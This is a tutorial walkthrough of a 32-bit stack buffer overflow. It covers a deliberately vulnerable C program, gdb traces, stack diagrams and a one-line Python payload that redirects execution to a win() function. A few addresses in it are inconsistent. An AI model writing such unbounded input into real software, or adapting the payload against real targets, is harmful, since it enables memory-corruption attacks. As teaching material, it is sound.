Smash the stack¶
Buffer Overflow refers to a situation when we are able write past the size of a variable , which results in change of data near them , When this type of overflow occur in the stack it is called a stack overflow . With this we can change the value of sensitive variables which are adjacent to the overflow , Also since the return address of a function is stored on the stack we can change the control flow of the program .
/* stack-example.c */
#include <stdio.h>
#include <stdlib.h>
void win()
{
printf("You Win ! ");
exit(0);
}
void vuln()
{
char arr[0x10];
scanf("%s",arr);
printf("Input : %s",arr);
}
int main()
{
vuln();
return 0;
}
Binary File : stack-example
The above program contains a buffer overflow bug . the size of the character array is 0x10 , since the scanf function does not limit the amount of input read from then user , if it is greater than 0x10 , it will be written after the arr variable . And if we give input large enough we can call the win()
by changing the return address of the vuln function .
Note
While debugging with gdb use the binary file provided , compiling the code on your own might change the address of the functions.
(gdb) x/10i main+11
0x80484e7 <main+11>: mov ebp,esp
0x80484e9 <main+13>: push ecx
0x80484ea <main+14>: sub esp,0x4
0x80484ed <main+17>: call 0x80484ab <vuln>
0x80484f2 <main+22>: mov eax,0x0
0x80484f7 <main+27>: add esp,0x4
...
When call
instruction is executed the address of the next instruction ie, 0x80484f2
is pushed on to the stack and the eip register is changed to 0x80484ab
which is the address of vuln function . The return address is stored on the stack so that after the executing of the vuln
the execution can be changed to that address , thus the remaining code of main function is executed .
┌──────────────┐
│ │
│ │ <─ ebp
...
│ │
│ │
├──────────────┤
│ 0x80484f2 │ <─esp : value pused by the call instruction ( return_address )
└──────────────┘
(gdb) x/3i 0x80484ea
0x80484ea <main+14>: sub esp,0x4
0x80484ed <main+17>: call 0x80484ab <vuln>
0x80484f2 <main+22>: mov eax,0x0
(gdb) b * 0x80484ed
Breakpoint 1 at 0x80484ed
(gdb) c
Breakpoint 1, 0x080484ed in main ()
(gdb) x/i $eip
=> 0x80484ed <main+17>: call 0x80484ab <vuln>
(gdb) x/4wx $esp
0xffffce20: 0xf7f9f3dc 0xffffce40 0x00000000 0xf7e04286
(gdb) si
0x080484ab in vuln ()
(gdb) x/4wx $esp
0xffffce1c: 0x080484f2 0xf7f9f3dc 0xffffce40 0x00000000
^
|_ return address pushed onto the stack
(gdb) x/i $eip
=> 0x80484ab <vuln>: push ebp
Let's see what is happening in the vuln function .
80484ab: push ebp
80484ac: mov ebp,esp
These two instruction is called the function prologue . It initializes a new stack frame for the function . The previous ebp
is pushed onto the stack and the ebp
is moved to the same position as esp
.
┌──────────────┐
│ │
├──────────────┤
│ 0x0x80484f2 │
├──────────────┤
│ previous_ebp │ ─> ebp , esp : Stack after the function prologue
└──────────────┘
(gdb) x/2i $eip
=> 0x80484ab <vuln>: push ebp
0x80484ac <vuln+1>: mov ebp,esp
(gdb) p/x $ebp
$1 = 0xffffce28
(gdb) si
0x080484ac in vuln ()
(gdb) x/4wx $esp
0xffffce18: 0xffffce28 0x080484f2 0xf7f9f3dc 0xffffce40
^
|_ ebp is pushed onto the stack
(gdb) x/i $eip
=> 0x80484ac <vuln+1>: mov ebp,esp
(gdb) si
0x080484ae in vuln ()
(gdb) p/x $ebp
$2 = 0xffffce18 /* Now ebp and esp points to the top of the stack */
80484ae: sub esp,0x18
80484b1: sub esp,0x8
These instruction allocates space in the stack for the local variables ( keep in mind that the stack grows from higher address to lower address )
80484b4: lea eax,[ebp-0x18]
80484b7: push eax
80484b8: push 0x804858b
80484bd: call 8048370 <__isoc99_scanf@plt>
The lea
instruction loads the address of ebp-0x18
( address of arr array ) to eax register . This address is then pushed on to the stack . If you examine 0x804856b
address , it actually points to "%s" . We are going to call the scanf function ( scanf("%s",arr)
) , in x86-32 bit the function arguments are stored on the stack in reverse order so we first push the address of the local variable arr then the address of the "%s"
string is pushed .
┌──────────────┐
│ │
├──────────────┤
│ 0x0x80484f2 │
├──────────────┤
│ previous_ebp │ <─ ebp
├──────────────┤
│ │
...
│ │
├──────────────┤
│ │<─ eax : ( ebp ─ 0x18 )
├──────────────┤ │
│ │ │
├──────────────┤ │
│ addr_arr │── : It is the starting address of arr array
├──────────────┤
│ 0x804858b │ <─ esp : It points to the format string
└──────────────┘
(gdb) b * 0x80484bd
Breakpoint 2 at 0x80484bd
(gdb) c
Continuing.
Breakpoint 2, 0x080484bd in vuln ()
(gdb) x/i $eip
=> 0x80484bd <vuln+18>: call 0x8048370 <__isoc99_scanf@plt>
(gdb) x/4wx $esp
0xffffcdf0: 0x0804858b 0xffffce00 0xf7ffcd00 0x00040000
^ ^
format string _| |_ address of arr array
(gdb) x/s 0x0804858b
0x804858b: "%s"
When scanf function is called our input will be saved on the stack since the scanf function reads data till carriage return and there is no limit check for the input , we can give input which is larger than the size of the array . If we give enough input we can actually overwrite the return address .
After giving 0x20 A's as input
┌──────────────┐ ┌──────────────┐
│ │ │ │
├──────────────┤ ├──────────────┤
│ 0x0x80484f2 │ │ AAAA │
├──────────────┤ ├──────────────┤
│ previous_ebp │ <─ ebp │ AAAA │ <─ ebp
├──────────────┤ ├──────────────┤ ─
│ │ │ AAAA │ │
... .... │ 0x18 x "A"
│ │ │ AAAA │ │
├──────────────┤ ├──────────────┤ │
│ │<─ eax │ AAAA │<─ eax ─
│ │ │ │ │ │
├──────────────┤ │ ├──────────────┤ │
│ addr_arr │── │ addr_arr │──
├──────────────┤ ├──────────────┤
│ 0x804858b │ <─ esp │ 0x804858b │ <─ esp
└──────────────┘ └──────────────┘
The staring of the array is from ebp-0x18
thus giving 0x18 A's we will reach till saved ebp , then next 4 byte will overwrite the saved ebp and the next will overwrite the return address .
(gdb) x/wx $ebp+0x4
0xffffce1c: 0x080484f2 /* return address before the overflow */
(gdb) b * 0x80484da
Breakpoint 5 at 0x80484da
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 4, 0x080484da in vuln ()
(gdb) x/4wx 0xffffce00
0xffffce00: 0x41414141 0x41414141 0x41414141 0x41414141
let's talk about function epilogue .
80484da: leave
80484db: ret
The leave instruction is actually
mov esp , ebp
pop ebp
This will move the esp back to the position of the saved ebp thus destroying all the space allocated for the local variable , then pop instruction will move the saved ebp value back to ebp register , it basically deletes the stack frame created for vuln function and restores the stack frame of the main function before the control is changed to main . The ret
instruction will pop the value on top of the stack to the eip register thus changing the control back main ( on normal execution ).
(gdb) x/i $eip
=> 0x80484da <vuln+47>: leave
(gdb) p/x $esp
$6 = 0xffffce00
(gdb) p/x $ebp
$7 = 0xffffce18
(gdb) si
Breakpoint 3, 0x080484db in vuln ()
(gdb) p/x $esp /* stack frame of vuln function is destroyed */
$8 = 0xffffce1c
(gdb) p/x $ebp
$9 = 0x41414141
(gdb) x/i $eip
=> 0x80484db <vuln+48>: ret
(gdb) si
0x41414141 in ?? ()
(gdb) p/x $eip
$5 = 0x41414141
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
The address of win function is 0804846b
(gdb) x/i win
0x804848b <win>: push ebp
So let's write the exploit . We have to give 0x1c junk data ( to overflow the arr array ) and then the address of the win function so that the return address will be overwritten with the address of the win()
, While giving the address as input we have to keep in mind that data is stored in Little-endian thus we have to give the address in reverse order. We will be using python to generate our crafted input which triggers the bug and calls the win function .
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Let's run it outside gdb .
python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"' | ./stack_example
Input : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win !
We have successfully changed the flow of the program .